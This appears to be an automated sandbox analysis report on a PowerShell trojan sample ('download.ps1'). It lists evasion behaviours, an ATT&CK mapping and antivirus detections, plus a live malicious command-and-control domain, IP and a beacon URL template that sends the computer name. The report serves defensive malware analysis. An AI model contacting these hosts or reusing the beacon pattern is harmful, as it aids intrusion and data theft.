Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6554Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3227Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1120Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000000.00000002.2154207173.000001C00F435000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2207985331.000001C026CF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus@
Source: powershell.exe, 00000000.00000002.2154207173.000001C00F435000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.2154207173.000001C00F435000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2154207173.000001C00F435000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware`SZ
Source: powershell.exe, 00000000.00000002.2210128863.000001C026EA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
Source: powershell.exe, 00000000.00000002.2154207173.000001C00F435000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine`SZ
Source: powershell.exe, 00000000.00000002.2154207173.000001C00F435000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.2154207173.000001C00F435000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.2154207173.000001C00F435000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2154207173.000001C00F435000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2154207173.000001C00F435000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.2154207173.000001C00F435000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		121
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager121
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps113%ReversingLabsScript.Trojan.Kongtuke
download.ps115%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://$qgy97hdrmk401l6/$o7znvsrtk05q3hy.php?id=$env:computername&key=$qkxaesfor&s=5270%Avira URL Cloudsafe
http://gajaechkfhfghal.top/26te7apny8htr.php?id=user-PC&key=60099241868&s=527100%Avira URL Cloudmalware
http://gajaechkfhfghal.top100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.181.68
truefalse
    		high
    gajaechkfhfghal.top
    		45.61.136.138
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://gajaechkfhfghal.top/26te7apny8htr.php?id=user-PC&key=60099241868&s=527true
      • Avira URL Cloud: malware
      		unknown
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://gajaechkfhfghal.toppowershell.exe, 00000000.00000002.2154207173.000001C00FDE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FB56000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifpowershell.exe, 00000000.00000002.2154207173.000001C0109F9000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FDEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E8BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E94E000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000000.00000002.2191669510.000001C01E753000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schema.org/WebPagepowershell.exe, 00000000.00000002.2154207173.000001C00FE0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C010A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C010D08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C010D15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C010D3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E94E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C0109F9000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://0.google.com/powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.google.com/logos/doodles/2024/seasonal-holidays-2024powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schema.org/WebPageXpowershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/powershell.exe, 00000000.00000002.2191669510.000001C01E753000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2191669510.000001C01E753000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://oneget.orgXpowershell.exe, 00000000.00000002.2154207173.000001C010D50000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://$qgy97hdrmk401l6/$o7znvsrtk05q3hy.php?id=$env:computername&key=$qkxaesfor&s=527powershell.exe, 00000000.00000002.2154207173.000001C00E909000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FB56000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.google.compowershell.exe, 00000000.00000002.2154207173.000001C00FDE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FDEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FE00000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://apis.google.compowershell.exe, 00000000.00000002.2191669510.000001C01E6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C010011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E8BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FE0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E94E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E9DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2154207173.000001C00E6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
